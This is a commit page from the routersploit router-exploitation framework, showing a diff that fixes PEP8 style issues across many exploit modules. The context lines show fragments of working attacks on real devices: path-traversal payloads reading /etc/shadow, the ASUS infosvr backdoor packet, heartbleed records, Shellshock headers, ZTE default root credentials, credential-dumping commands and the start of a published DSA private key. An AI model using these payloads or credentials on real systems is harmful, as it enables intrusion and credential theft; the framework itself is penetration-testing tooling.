Skip to content

R
routersploit
Commit 350f1212 by fwkz
Options

Fixing PEP8 violations.

parent 73e8b5cd
Showing with 140 additions and 115 deletions
routersploit/modules/exploits/2wire/4011g_5012nv_path_traversal.py
......@@ -42,7 +42,7 @@ class Exploit(exploits.Exploit):
print_status("Sending read {} file request".format(self.filename))
url = "{}:{}/goform/enhAuthHandler".format(self.target, self.port)
headers = {u"Content-Type": u"application/x-www-form-urlencoded"}
data = {"__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../..{}".format(self.filename),
......
routersploit/modules/exploits/2wire/gateway_auth_bypass.py
......@@ -49,7 +49,7 @@ class Exploit(exploits.Exploit):
# checking if the target is valid
url = "{}:{}/".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
......@@ -59,7 +59,7 @@ class Exploit(exploits.Exploit):
# checking if authentication can be bypassed
url = "{}:{}/xslt".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
......
routersploit/modules/exploits/3com/3cradsl72_info_disclosure.py
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com 3CRADSL72 Info Disclosure',
'description': 'Exploits 3Com 3CRADSL72 information disclosure vulnerability that allows to fetch credentials for SQL sa account',
'description': 'Exploits 3Com 3CRADSL72 information disclosure vulnerability '
'that allows to fetch credentials for SQL sa account',
'authors': [
'Karb0nOxyde <karb0noxyde[at]gmail.com>', # vulnerability discovery
'Ivan Casado Ruiz <casadoi[at]yahoo.co.uk>', # vulnerability discovery
......@@ -28,7 +29,7 @@ class Exploit(exploits.Exploit):
'http://www.securityfocus.com/bid/11408/exploit',
],
'devices': [
'3Com 3CRADSL72',
'3Com 3CRADSL72',
],
}
......
routersploit/modules/exploits/3com/ap8760_password_disclosure.py
......@@ -48,7 +48,7 @@ class Exploit(exploits.Exploit):
print_status("Extracting credentials")
username = re.findall('<input type="text" name="szUsername" size=16 value="(.+?)">', response.text)
password = re.findall('<input type="password" name="szPassword" size=16 maxlength="16" value="(.+?)">', response.text)
if len(username) and len(password):
print_success("Exploit success")
creds.append((username[0], password[0]))
......
routersploit/modules/exploits/3com/imc_info_disclosure.py
......@@ -26,7 +26,7 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/12680/',
],
'devices': [
'3Com Intelligent Management Center',
'3Com Intelligent Management Center',
],
}
......
routersploit/modules/exploits/3com/imc_path_traversal.py
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com IMC Path Traversal',
'description': 'Exploits 3Com Intelligent Management Center path traversal vulnerability. If the target is vulnerable it is possible to read file from the filesystem.',
'description': 'Exploits 3Com Intelligent Management Center path traversal vulnerability. '
'If the target is vulnerable it is possible to read file from the filesystem.',
'authors': [
'Richard Brain', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -26,7 +27,7 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/12679/',
],
'devices': [
'3Com Intelligent Management Center',
'3Com Intelligent Management Center',
],
}
......@@ -34,7 +35,6 @@ class Exploit(exploits.Exploit):
port = exploits.Option(8080, 'Target port') # default port
filename = exploits.Option('\\windows\\win.ini', 'File to read from the filesystem')
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
......
routersploit/modules/exploits/3com/officeconnect_info_disclosure.py
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com OfficeConnect Info Disclosure',
'description': 'Exploits 3Com OfficeConnect information disclosure vulnerability. If the target is vulnerable it is possible to read sensitive information.',
'description': 'Exploits 3Com OfficeConnect information disclosure vulnerability. '
'If the target is vulnerable it is possible to read sensitive information.',
'authors': [
'Luca Carettoni <luca.carettoni[at]ikkisoft.com>', # vulnerablity discovery
'iDefense', # vulnerability discovery
......@@ -28,7 +29,7 @@ class Exploit(exploits.Exploit):
'http://seclists.org/vulnwatch/2005/q1/42',
],
'devices': [
'3Com OfficeConnect',
'3Com OfficeConnect',
],
}
......@@ -59,13 +60,13 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
for resource in self.resources:
for resource in self.resources:
url = "{}:{}{}".format(self.target, self.port, resource)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if "pppoe_username" in response.text and "pppoe_password" in response.text:
self.valid = resource
return True # target is vulnerable
......
routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
......@@ -23,10 +23,10 @@ class Exploit(exploits.Exploit):
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt',
'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt',
],
'devices': [
'Asmax AR 1004g',
'Asmax AR 1004g',
],
}
......
routersploit/modules/exploits/asus/infosvr_backdoor_rce.py
......@@ -70,7 +70,7 @@ class Exploit(exploits.Exploit):
sock.bind(('0.0.0.0', 9999))
sock.settimeout(2)
packet = (b'\x0C\x15\x33\x00'+ os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')
packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')
try:
sock.sendto(packet, (self.target, 9999))
......@@ -86,7 +86,7 @@ class Exploit(exploits.Exploit):
if len(data) == 512 and data[1] == "\x16":
break
length = struct.unpack('<H', data[14:16])[0]
output = data[16:16+length]
output = data[16:16 + length]
sock.close()
return output
......
routersploit/modules/exploits/belkin/g_plus_info_disclosure.py
......@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Belkin G Info Disclosure',
'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure vulnerability which allows fetching sensitive information such as credentials.',
'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure '
'vulnerability which allows fetching sensitive information such as credentials.',
'authors': [
'DarkFig', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -42,15 +43,17 @@ class Exploit(exploits.Exploit):
if response is None:
return
var = ['pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
var = [
'pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd'
]
data = []
for v in var:
......@@ -76,15 +79,17 @@ class Exploit(exploits.Exploit):
if response is None:
return False # target is not vulnerable
var = ['pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
var = [
'pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd'
]
if any(map(lambda x: x in response.text, var)):
return True # target vulnerable
......
routersploit/modules/exploits/cisco/dpc2420_info_disclosure.py
......@@ -58,4 +58,3 @@ class Exploit(exploits.Exploit):
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/cisco/ucm_info_disclosure.py
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Cisco UCM Info Disclosure',
'description': 'Module exploits information disclosure vulnerability in Cisco UCM devices. If the target is vulnerable it is possible to read sensitive information through TFTP service.',
'description': 'Module exploits information disclosure vulnerability in Cisco UCM devices. '
'If the target is vulnerable it is possible to read sensitive information through TFTP service.',
'authors': [
'Daniel Svartman <danielsvartman[at]gmail.com', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -72,4 +73,3 @@ class Exploit(exploits.Exploit):
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/cisco/ucs_manager_rce.py
......@@ -19,7 +19,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Cisco UCS Manager RCE',
'description': 'Module exploits Cisco UCS Manager 2.1 (1b) Remote Code Execution vulnerability which allows executing commands on operating system level.',
'description': 'Module exploits Cisco UCS Manager 2.1 (1b) Remote Code Execution vulnerability which '
'allows executing commands on operating system level.',
'authors': [
'thatchriseckert', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -84,4 +85,3 @@ class Exploit(exploits.Exploit):
return True
return False
routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py
......@@ -10,7 +10,7 @@ from routersploit import (
http_request,
mute,
validators,
)
)
class Exploit(exploits.Exploit):
......@@ -23,13 +23,13 @@ class Exploit(exploits.Exploit):
'description': 'WiFi router Comtrend CT 5361T suffers from a Password Disclosure Vulnerability',
'authors': [
'TUNISIAN CYBER', # routersploit module
],
],
'references': [
'https://packetstormsecurity.com/files/126129/Comtrend-CT-5361T-Password-Disclosure.html'
],
],
'devices': [
'Comtrend CT 5361T (more likely CT 536X)',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
......
routersploit/modules/exploits/dlink/dir_300_320_600_615_info_disclosure.py
......@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'D-Link DIR-300 & DIR-320 & DIR-600 & DIR-615 Info Disclosure',
'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600, DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600,'
'DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
'authors': [
'tytusromekiatomek <tytusromekiatomek[at]inbox.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -63,7 +64,7 @@ class Exploit(exploits.Exploit):
return False # target is not vulnerable
creds = re.findall("\n\t\t\t(.+?):(.+?)\n\n\t\t\t", response.text)
if len(creds):
return True # target is vulnerable
......
routersploit/modules/exploits/dlink/dir_300_320_615_auth_bypass.py
......@@ -15,7 +15,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass',
'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 revD devices. It is possible to access administration panel without providing password.',
'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615'
'revD devices. It is possible to access administration panel without providing password.',
'authors': [
'Craig Heffner', # vulnerability discovery
'Karol Celin', # vulnerability discovery
......@@ -58,7 +59,7 @@ class Exploit(exploits.Exploit):
# checking if authentication can be baypassed
url = "{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
......
routersploit/modules/exploits/dlink/dir_645_815_rce.py
......@@ -19,7 +19,7 @@ class Exploit(exploits.Exploit):
'name': 'D-Link DIR-645 & DIR-815 RCE',
'description': 'Module exploits D-Link DIR-645 and DIR-815 Remote Code Execution vulnerability which allows executing command on the device.',
'authors': [
'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery
'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
......
routersploit/modules/exploits/dlink/dsl_2730b_2780b_526b_dns_change.py
......@@ -38,7 +38,6 @@ class Exploit(exploits.Exploit):
dns1 = exploits.Option('8.8.8.8', 'Primary DNS Server')
dns2 = exploits.Option('8.8.4.4', 'Seconary DNS Server')
def run(self):
url = "{}:{}/dnscfg.cgi?dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=".format(self.target,
self.port,
......
routersploit/modules/exploits/dlink/dvg_n5402sp_path_traversal.py
......@@ -66,7 +66,18 @@ class Exploit(exploits.Exploit):
def check(self):
# address and parameters
url = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../../etc/shadow", "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "blah", "%3Apassword": "blah","%3Aaction": "login","%3Asessionid": "abcdefgh"}
data = {
"getpage": "html/index.html",
"*errorpage*": "../../../../../../../../../../../etc/shadow",
"var%3Amenu": "setup",
"var%3Apage": "connected",
"var%": "",
"objaction": "auth",
"%3Ausername": "blah",
"%3Apassword": "blah",
"%3Aaction": "login",
"%3Asessionid": "abcdefgh"
}
# connection
response = http_request(method="POST", url=url, data=data)
......@@ -77,4 +88,3 @@ class Exploit(exploits.Exploit):
return True # target vulnerable
return False # target not vulnerable
routersploit/modules/exploits/huawei/e5331_mifi_info_disclosure.py
......@@ -49,7 +49,7 @@ class Exploit(exploits.Exploit):
regexp = "<{}>(.+?)</{}>".format(option, option)
value = re.findall(regexp, response.text)
if value:
res.append((option, value[0]))
res.append((option, value[0]))
if len(res):
print_success("Found sensitive information!")
......
routersploit/modules/exploits/huawei/hg520_info_dislosure.py
......@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Huawei HG520 Information Disclosure',
'description': 'Module exploits Huawei EchoLife HG520 information disclosure vulnerablity. If the target is vulnerable it is possible to retrieve sensitive information.',
'description': 'Module exploits Huawei EchoLife HG520 information disclosure vulnerablity.'
'If the target is vulnerable it is possible to retrieve sensitive information.',
'authors': [
'hkm', # vulnerablity discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -70,7 +71,7 @@ class Exploit(exploits.Exploit):
def run(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
print_status("Sending exploit payload")
sock.sendto(self.payload, (self.target, 43690))
......@@ -95,7 +96,7 @@ class Exploit(exploits.Exploit):
response = sock.recv(1024)
except:
return False # target is not vulnerable
if len(response):
return True # target is vulnerable
......
routersploit/modules/exploits/huawei/hg866_password_change.py
......@@ -48,7 +48,7 @@ class Exploit(exploits.Exploit):
if response.status_code == 200:
print_success("Administrator's password has been changed to {}".format(self.password))
else:
print_error("Exploit failed - could not change password")
print_error("Exploit failed - could not change password")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/ipfire/ipfire_shellshock.py
......@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'IPFire Shellshock',
'description': 'Exploits shellshock vulnerability in IPFire M= 2.15 Core Update 82. If the target is vulnerable it is possible to execute commands on operating system level.',
'description': 'Exploits shellshock vulnerability in IPFire M= 2.15 Core Update 82.'
'If the target is vulnerable it is possible to execute commands on operating system level.',
'authors': [
'Claudio Viviani', # vulnerability discovery
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
......@@ -27,7 +28,7 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/34839',
],
'devices': [
'IPFire <= 2.15 Core Update 82',
'IPFire <= 2.15 Core Update 82',
],
}
......@@ -72,7 +73,7 @@ class Exploit(exploits.Exploit):
return ""
if response.status_code == 200:
start = response.text.find(marker) + len(marker) + 1 # marker and whitespace
start = response.text.find(marker) + len(marker) + 1 # marker and whitespace
end = response.text.find(marker, start) - 48
return response.text[start:end]
......@@ -86,7 +87,7 @@ class Exploit(exploits.Exploit):
marker = random_text(32)
cmd = "echo {}".format(marker)
payload = self.payload.replace("{{cmd}}", cmd)
headers = {
'VULN': payload,
}
......
routersploit/modules/exploits/linksys/wap54gv3_rce.py
......@@ -19,7 +19,9 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Linksys WAP54Gv3',
'description': 'Module exploits remote command execution in Linksys WAP54Gv3 devices. Debug interface allows executing root privileged shell commands is available on dedicated web pages on the device.',
'description': 'Module exploits remote command execution in Linksys WAP54Gv3 devices.'
'Debug interface allows executing root privileged shell commands is available'
'on dedicated web pages on the device.',
'authors': [
'Phil Purviance', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -64,7 +66,7 @@ class Exploit(exploits.Exploit):
if len(res):
return res[0]
return ""
@mute
......
routersploit/modules/exploits/multi/heartbleed.py
......@@ -53,10 +53,10 @@ class Exploit(exploits.Exploit):
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
00 0f 00 01 01
'''
hb = '''
hb = '''
18 03 02 00 03
01 40 00
'''
......@@ -66,9 +66,9 @@ class Exploit(exploits.Exploit):
def hexdump(self, s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
lin = [c for c in s[b: b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
......@@ -77,7 +77,7 @@ class Exploit(exploits.Exploit):
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
......@@ -92,7 +92,7 @@ class Exploit(exploits.Exploit):
rdata += data
remain -= len(data)
return rdata
return rdata
def recvmsg(self, s):
hdr = self.recvall(s, 5)
......@@ -139,11 +139,11 @@ class Exploit(exploits.Exploit):
while True:
typ, ver, pay = self.recvmsg(s)
if typ == None:
if typ is None:
print_error("Server closed connection without sending Server Hello.")
print_error("Exploit failed")
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
......@@ -163,7 +163,7 @@ class Exploit(exploits.Exploit):
while True:
typ, ver, pay = self.recvmsg(s)
if typ == None:
if typ is None:
return False # target is not vulnerable
if typ == 22 and ord(pay[0]) == 0x0E:
......
routersploit/modules/exploits/multi/shellshock.py
......@@ -31,7 +31,7 @@ class Exploit(exploits.Exploit):
'http://blog.trendmicro.com/trendlabs-security-intelligence/shell-attack-on-your-server-bash-bug-cve-2014-7169-and-cve-2014-6271/',
],
'devices': [
'Multi',
'Multi',
],
}
......@@ -106,7 +106,7 @@ class Exploit(exploits.Exploit):
response = http_request(method=self.method, url=url, headers=headers)
if response is None:
continue
if str(solution) in response.text:
self.valid = payload
return True # target is vulnerable
......
routersploit/modules/exploits/multi/ssh_auth_keys.py
......@@ -147,7 +147,7 @@ class Exploit(exploits.Exploit):
"""
},
{ # loadbalancer.org enterprise va
"user":"root",
"user": "root",
"private_key": """
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW
......
routersploit/modules/exploits/multi/tcp_32764_info_disclosure.py
......@@ -85,7 +85,7 @@ class Exploit(exploits.Exploit):
print_error("Target is not vulnerable")
def execute(self, s, message, payload=""):
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload)+1)
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload) + 1)
s.send(header + payload + "\x00")
r = s.recv(0xC)
......
routersploit/modules/exploits/multi/tcp_32764_rce.py
......@@ -79,7 +79,7 @@ class Exploit(exploits.Exploit):
print self.execute(s, 7, cmd.strip("\n"))
def execute(self, s, message, payload=""):
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload)+1)
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload) + 1)
s.send(header + payload + "\x00")
r = s.recv(0xC)
......
routersploit/modules/exploits/netcore/udp_53413_rce.py
......@@ -27,8 +27,8 @@ class Exploit(exploits.Exploit):
'http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/',
],
'devices': [
'Netcore',
'Netis',
'Netcore',
'Netis',
],
}
......@@ -65,7 +65,7 @@ class Exploit(exploits.Exploit):
sock.settimeout(10.0)
try:
sock.sendto(payload, (self.target, 53413))
sock.sendto(payload, (self.target, 53413))
response = sock.recv(1024)
except:
pass
......
routersploit/modules/exploits/netgear/n300_auth_bypass.py
......@@ -25,15 +25,15 @@ class Exploit(exploits.Exploit):
'http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.html',
],
'devices': [
'Netgear N300',
'Netgear JNR1010v2',
'Netgear JNR3000',
'Netgear JWNR2000v5',
'Netgear JWNR2010v5',
'Netgear R3250',
'Netgear WNR2020',
'Netgear WNR614',
'Netgear WNR618',
'Netgear N300',
'Netgear JNR1010v2',
'Netgear JNR3000',
'Netgear JWNR2000v5',
'Netgear JWNR2010v5',
'Netgear R3250',
'Netgear WNR2020',
'Netgear WNR614',
'Netgear WNR618',
]
}
......
routersploit/modules/exploits/netgear/prosafe_rce.py
......@@ -19,24 +19,25 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Netgear ProSafe RCE',
'description': 'Module exploits remote command execution vulnerability in Netgear ProSafe WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.',
'description': 'Module exploits remote command execution vulnerability in Netgear ProSafe'
'WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.',
'authors': [
'Andrei Costin <andrei[at]firmware.re>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'Andrei Costin <andrei[at]firmware.re>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://firmware.re/vulns/acsa-2015-002.php',
'https://www.blackhat.com/docs/asia-16/materials/asia-16-Costin-Automated-Dynamic-Firmware-Analysis-At-Scale-A-Case-Study-On-Embedded-Web-Interfaces.pdf',
],
],
'devices': [
'Netgear ProSafe WC9500',
'Netgear ProSafe WC7600',
'Netgear ProSafe WC7520',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
......@@ -44,7 +45,7 @@ class Exploit(exploits.Exploit):
print_status("Invoking command loop...")
self.command_loop()
else:
print_error("Target is not vulnerable")
print_error("Target is not vulnerable")
def command_loop(self):
while 1:
......
routersploit/modules/exploits/tplink/wdr740nd_wdr740n_path_traversal.py
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'TP-Link WDR740ND & WDR740N Path Traversal',
'description': 'Exploits TP-Link WDR740ND and WDR740N path traversal vulnerability that allows to read files from the filesystem.',
'description': 'Exploits TP-Link WDR740ND and WDR740N path traversal vulnerability'
'that allowsto read files from the filesystem.',
'authors': [
'websec.ca', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -26,8 +27,8 @@ class Exploit(exploits.Exploit):
'http://www.websec.mx/publicacion/advisories/tplink-wdr740-path-traversal',
],
'devices': [
'TP-Link WDR740ND',
'TP-Link WDR740N',
'TP-Link WDR740ND',
'TP-Link WDR740N',
],
}
......
routersploit/modules/exploits/ubiquiti/airos_6_x.py
......@@ -103,7 +103,7 @@ class Exploit(exploits.Exploit):
upload_params = {'file': ('../../../../tmp/airview.uavr', tmp_payload, {'Expect': ''})}
response = http_request(url=upload_url, method='POST', files=upload_params)
tmp_payload.close()
if response is None:
......@@ -116,9 +116,9 @@ class Exploit(exploits.Exploit):
# Upload empty file to "clear" the airview.uavr file
clean_tmp_file = tempfile.TemporaryFile()
clean_tmp_file.seek(0)
upload_params = {'file': ('../../../../tmp/airview.uavr', clean_tmp_file, {'Expect': ''})}
http_request(url=upload_url, method='POST', files=upload_params)
clean_tmp_file.close()
......
routersploit/modules/exploits/zte/f609_config_disclosure.py
......@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'ZTE F609 Config Disclosure',
'description': 'Module exploits ZTE F609 Config Disclosure. If the target is possible to authentiate to the device.',
'description': 'Module exploits ZTE F609 Config Disclosure.'
'If the target is possible to authentiate to the device.',
'authors': [
'devilscream', # routersploit module
],
......@@ -29,8 +30,8 @@ class Exploit(exploits.Exploit):
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
config = "sendcmd 1 DB p DevAuthInfo"
def run(self):
......
routersploit/modules/exploits/zte/f660_config_disclosure.py
......@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'ZTE F660 Config Disclosure',
'description': 'Module exploits ZTE F660 Config Disclosure. If the target is possible to authentiate to the device.',
'description': 'Module exploits ZTE F660 Config Disclosure.'
'If the target is possible to authentiate to the device.',
'authors': [
'devilscream', # vulnerability discovery & routersploit module
],
......@@ -29,8 +30,8 @@ class Exploit(exploits.Exploit):
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
config = "cat /userconfig/cfg/db_user_cfg.xml | grep -E 'UserName|Username|Password|password|ESSID|KeyPhase'"
def run(self):
......
routersploit/modules/exploits/zte/f6xx_default_root.py
......@@ -31,8 +31,8 @@ class Exploit(exploits.Exploit):
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
def run(self):
try:
......@@ -59,7 +59,7 @@ class Exploit(exploits.Exploit):
tn.close()
except:
print_error("Connection error {}:{}".format(self.target, self.port))
@mute
def check(self):
try:
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment